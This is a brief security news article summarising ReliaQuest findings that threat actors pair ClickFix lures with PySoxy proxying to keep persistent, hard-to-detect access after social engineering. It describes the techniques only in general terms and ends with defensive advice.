Attackers Use ClickFix and PySoxy Proxying for Persistent Access

Attackers are increasingly weaponizing legitimate open-source tools to establish persistent access following successful social engineering campaigns. Researchers from ReliaQuest have identified a growing trend in which threat actors rely on ClickFix and PySoxy proxying techniques to remain undetected within compromised environments.

By exploiting these publicly available utilities, adversaries can bypass traditional security controls and maintain a foothold long after the initial breach. The ClickFix method leverages a deceptive user interface that tricks victims into executing malicious code under the guise of a routine update or security fix. Meanwhile, PySoxy provides a robust proxying capability that allows attackers to route traffic through compromised machines, effectively masking their command-and-control infrastructure.

This dual approach not only extends the attacker’s dwell time but also complicates detection efforts for security teams. ReliaQuest’s analysis underscores how the abuse of trusted, open-source components enables threat actors to blend in with normal network activity, making it harder for defenders to distinguish between legitimate administrative actions and malicious behavior.

Organizations are urged to scrutinize all instances of remote execution and proxy usage, especially when triggered by unsolicited prompts or social engineering lures. As attackers continue to refine their tactics, reliance on open-source tools for persistence is likely to become even more prevalent.